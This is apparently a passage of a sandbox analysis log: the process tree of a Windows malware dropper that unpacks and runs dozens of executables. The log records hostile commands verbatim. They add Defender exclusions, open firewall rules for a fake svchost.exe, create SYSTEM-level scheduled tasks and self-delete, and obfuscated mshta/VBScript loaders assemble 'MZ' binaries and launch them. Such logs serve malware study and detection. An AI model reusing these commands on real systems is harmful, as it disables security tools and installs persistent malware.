-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:7496
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:6328
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:6472
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ULW25_OgZXk3SdjqZOQXwx1Q.exe"C:\Users\Admin\Pictures\Adobe Films\ULW25_OgZXk3SdjqZOQXwx1Q.exe"6⤵PID:5948
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ULW25_OgZXk3SdjqZOQXwx1Q.exe" & exit7⤵PID:7716
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:4392
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cT2p5d5Ef1TlRjdgQ94MCpXu.exe"C:\Users\Admin\Pictures\Adobe Films\cT2p5d5Ef1TlRjdgQ94MCpXu.exe"6⤵PID:5940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\cT2p5d5Ef1TlRjdgQ94MCpXu.exe" & exit7⤵PID:5052
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:8180
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nMH6L3MWucBG1n0w5Tp6SC1e.exe"C:\Users\Admin\Pictures\Adobe Films\nMH6L3MWucBG1n0w5Tp6SC1e.exe"6⤵PID:5932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 3127⤵
- Program crash
PID:5356
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mqA98Z5olqHPQTi2hedrKpAB.exe"C:\Users\Admin\Pictures\Adobe Films\mqA98Z5olqHPQTi2hedrKpAB.exe"6⤵PID:5924
-
-
C:\Users\Admin\Pictures\Adobe Films\gAPz2X7Vnoj2HqU8bUbxsIUN.exe"C:\Users\Admin\Pictures\Adobe Films\gAPz2X7Vnoj2HqU8bUbxsIUN.exe"6⤵PID:5916
-
-
C:\Users\Admin\Pictures\Adobe Films\BzVEmPsw5_I3ZwjIjiEbLqwn.exe"C:\Users\Admin\Pictures\Adobe Films\BzVEmPsw5_I3ZwjIjiEbLqwn.exe"6⤵PID:5908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:6268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:1428
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:6372
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:4988
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:4140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵PID:6312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵PID:5356
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:4420
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:3492
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:2820
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1uav0Z9zz8Dl9yRe9RF5Xwrj.exe"C:\Users\Admin\Pictures\Adobe Films\1uav0Z9zz8Dl9yRe9RF5Xwrj.exe"6⤵PID:5900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\1uav0Z9zz8Dl9yRe9RF5Xwrj.exe" & exit7⤵PID:7556
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:4204
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DkVnYtai7AOoVwQhlTkNcco1.exe"C:\Users\Admin\Pictures\Adobe Films\DkVnYtai7AOoVwQhlTkNcco1.exe"6⤵PID:5888
-
-
C:\Users\Admin\Pictures\Adobe Films\we61iZxXBEZgXHOAWSmNAwKT.exe"C:\Users\Admin\Pictures\Adobe Films\we61iZxXBEZgXHOAWSmNAwKT.exe"6⤵PID:5880
-
C:\Users\Admin\Pictures\Adobe Films\we61iZxXBEZgXHOAWSmNAwKT.exe"C:\Users\Admin\Pictures\Adobe Films\we61iZxXBEZgXHOAWSmNAwKT.exe"7⤵PID:3308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9ziwV79Owlu6mjtoAlqcf85X.exe"C:\Users\Admin\Pictures\Adobe Films\9ziwV79Owlu6mjtoAlqcf85X.exe"6⤵PID:5868
-
-
C:\Users\Admin\Pictures\Adobe Films\hTE9wqUxXBznv7dnCwshUxhv.exe"C:\Users\Admin\Pictures\Adobe Films\hTE9wqUxXBznv7dnCwshUxhv.exe"6⤵PID:5860
-
-
C:\Users\Admin\Pictures\Adobe Films\Av7NR3Ue5vris2Z_jSmJnF3I.exe"C:\Users\Admin\Pictures\Adobe Films\Av7NR3Ue5vris2Z_jSmJnF3I.exe"6⤵PID:5852
-
-
C:\Users\Admin\Pictures\Adobe Films\FZf6HdQow_ORJViBVK8LNmMU.exe"C:\Users\Admin\Pictures\Adobe Films\FZf6HdQow_ORJViBVK8LNmMU.exe"6⤵PID:5812
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:5632
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DZWc1IMBIQqT4FBEznyBYvO3.exe"C:\Users\Admin\Pictures\Adobe Films\DZWc1IMBIQqT4FBEznyBYvO3.exe"6⤵PID:5804
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1060
-
-
C:\Users\Admin\Documents\WINwr1DeqYylL5k6HhOOeX_E.exe"C:\Users\Admin\Documents\WINwr1DeqYylL5k6HhOOeX_E.exe"7⤵PID:7780
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zEhQfeyNLO9vJPoQOvKADAnN.exe"C:\Users\Admin\Pictures\Adobe Films\zEhQfeyNLO9vJPoQOvKADAnN.exe"6⤵PID:5796
-
-
C:\Users\Admin\Pictures\Adobe Films\5g1h0rYgfCWj_FcgPpfYLJ9d.exe"C:\Users\Admin\Pictures\Adobe Films\5g1h0rYgfCWj_FcgPpfYLJ9d.exe"6⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 4007⤵
- Program crash
PID:5136
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tQ_QxVuufmadnv9Plr6vSYeB.exe"C:\Users\Admin\Pictures\Adobe Films\tQ_QxVuufmadnv9Plr6vSYeB.exe"6⤵PID:6124
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe7⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"8⤵PID:6164
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe7⤵PID:5396
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:4552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 5568⤵
- Executes dropped EXE
- Program crash
PID:3572
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qOdWRRyalK5WgrCrBqhYIygR.exe"C:\Users\Admin\Pictures\Adobe Films\qOdWRRyalK5WgrCrBqhYIygR.exe"6⤵PID:4832
-
-
C:\Users\Admin\Pictures\Adobe Films\8mtVQgynGb7XZtZEN2K0xabK.exe"C:\Users\Admin\Pictures\Adobe Films\8mtVQgynGb7XZtZEN2K0xabK.exe"6⤵PID:5752
-
-
C:\Users\Admin\Pictures\Adobe Films\Df3OYawrUhmqqIFqGoXbriGs.exe"C:\Users\Admin\Pictures\Adobe Films\Df3OYawrUhmqqIFqGoXbriGs.exe"6⤵PID:5536
-
-
C:\Users\Admin\Pictures\Adobe Films\wA1zCIy78Nj9a0dS9_1LOMJC.exe"C:\Users\Admin\Pictures\Adobe Films\wA1zCIy78Nj9a0dS9_1LOMJC.exe"6⤵PID:6668
-
C:\Users\Admin\Pictures\Adobe Films\wA1zCIy78Nj9a0dS9_1LOMJC.exe"C:\Users\Admin\Pictures\Adobe Films\wA1zCIy78Nj9a0dS9_1LOMJC.exe"7⤵PID:2872
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe"C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe"6⤵PID:7056
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵PID:3340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\8zeD31H2dfmubi_x_2f6Zovn.exe" ) do taskkill -im "%~NxK" -F8⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵PID:7476
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵PID:7760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵PID:8148
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵PID:4760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵PID:8156
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "8zeD31H2dfmubi_x_2f6Zovn.exe" -F9⤵
- Kills process with taskkill
PID:4224
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\L5_2C22gi5DXI_H6GVfL3l13.exe"C:\Users\Admin\Pictures\Adobe Films\L5_2C22gi5DXI_H6GVfL3l13.exe"6⤵PID:6108
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe4⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue195c40958f528163.exeTue195c40958f528163.exe5⤵
- Executes dropped EXE
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue195c40958f528163.exeC:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue195c40958f528163.exe6⤵PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue195c40958f528163.exeC:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue195c40958f528163.exe6⤵PID:4180
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19f51bcd77a.exeTue19f51bcd77a.exe5⤵
- Executes dropped EXE
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19f51bcd77a.exeC:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19f51bcd77a.exe6⤵PID:4060
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue193858933525b62.exe4⤵PID:3472
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue193858933525b62.exeTue193858933525b62.exe5⤵
- Executes dropped EXE
PID:3984 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))6⤵PID:1456
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f7⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ8⤵PID:4352
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))9⤵PID:4492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f10⤵PID:4632
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )9⤵PID:4300
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E10⤵PID:1968
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "11⤵PID:4680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"11⤵PID:4960
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y .\bENCc.E11⤵PID:5756
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue193858933525b62.exe" /f8⤵
- Kills process with taskkill
PID:4452
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone4⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19150ee2be694c8a4.exeTue19150ee2be694c8a4.exe /mixone5⤵
- Executes dropped EXE
PID:2140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue19150ee2be694c8a4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19150ee2be694c8a4.exe" & exit6⤵PID:5360
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue19150ee2be694c8a4.exe" /f7⤵
- Kills process with taskkill
PID:4300
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe4⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue192762f1cd058ddf8.exeTue192762f1cd058ddf8.exe5⤵
- Executes dropped EXE
PID:2108 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2108 -s 13646⤵
- Program crash
PID:2208
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe4⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19411ac950924ec3f.exeTue19411ac950924ec3f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2960 -
C:\Users\Admin\AppData\Roaming\3728898.exe"C:\Users\Admin\AppData\Roaming\3728898.exe"6⤵PID:4644
-
-
C:\Users\Admin\AppData\Roaming\1729464.exe"C:\Users\Admin\AppData\Roaming\1729464.exe"6⤵PID:4804
-
-
C:\Users\Admin\AppData\Roaming\1229957.exe"C:\Users\Admin\AppData\Roaming\1229957.exe"6⤵PID:4892
-
-
C:\Users\Admin\AppData\Roaming\543689.exe"C:\Users\Admin\AppData\Roaming\543689.exe"6⤵PID:4996
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\543689.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\543689.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))7⤵PID:4900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\543689.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\543689.exe" ) do taskkill -f -Im "%~NXZ"8⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i9⤵PID:4640
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))10⤵PID:4592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"11⤵PID:4408
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )10⤵PID:4772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *11⤵PID:3596
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "12⤵PID:6720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"12⤵PID:6728
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K12⤵PID:8140
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K13⤵PID:7364
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "543689.exe"9⤵
- Kills process with taskkill
PID:4536
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\6965319.exe"C:\Users\Admin\AppData\Roaming\6965319.exe"6⤵PID:5044
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:4192
-
-
-
C:\Users\Admin\AppData\Roaming\6151660.exe"C:\Users\Admin\AppData\Roaming\6151660.exe"6⤵PID:5096
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue1993b3f72c.exeTue1993b3f72c.exe5⤵
- Executes dropped EXE
PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19c06f159e0ec.exeTue19c06f159e0ec.exe5⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe4⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19c78ded4d176ac.exeTue19c78ded4d176ac.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe4⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19c1338f41ab.exeTue19c1338f41ab.exe5⤵
- Executes dropped EXE
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe4⤵PID:2868
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19761b3b8d9d.exeTue19761b3b8d9d.exe5⤵
- Executes dropped EXE
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19761b3b8d9d.exeC:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19761b3b8d9d.exe6⤵PID:3376
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe4⤵PID:3644
-
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue1969586bcbf58493.exeTue1969586bcbf58493.exe5⤵PID:3572
-
C:\Users\Admin\Pictures\Adobe Films\9lCIvrVCVC2mQAsYbmV8VgEi.exe"C:\Users\Admin\Pictures\Adobe Films\9lCIvrVCVC2mQAsYbmV8VgEi.exe"6⤵PID:2968
-
-
C:\Users\Admin\Pictures\Adobe Films\IgyofFxY3rMYXkaDdx_2LSWN.exe"C:\Users\Admin\Pictures\Adobe Films\IgyofFxY3rMYXkaDdx_2LSWN.exe"6⤵PID:5184
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7540
-
-
C:\Users\Admin\Documents\xjOOrFSAh5YQ9oxN4JFQW53f.exe"C:\Users\Admin\Documents\xjOOrFSAh5YQ9oxN4JFQW53f.exe"7⤵PID:3400
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YPM1Q6_xfBfKvXV5y277u9gQ.exe"C:\Users\Admin\Pictures\Adobe Films\YPM1Q6_xfBfKvXV5y277u9gQ.exe"6⤵PID:5200
-
-
C:\Users\Admin\Pictures\Adobe Films\Y3e6JaaIyxRLqmGjYEFVCESJ.exe"C:\Users\Admin\Pictures\Adobe Films\Y3e6JaaIyxRLqmGjYEFVCESJ.exe"6⤵PID:5220
-
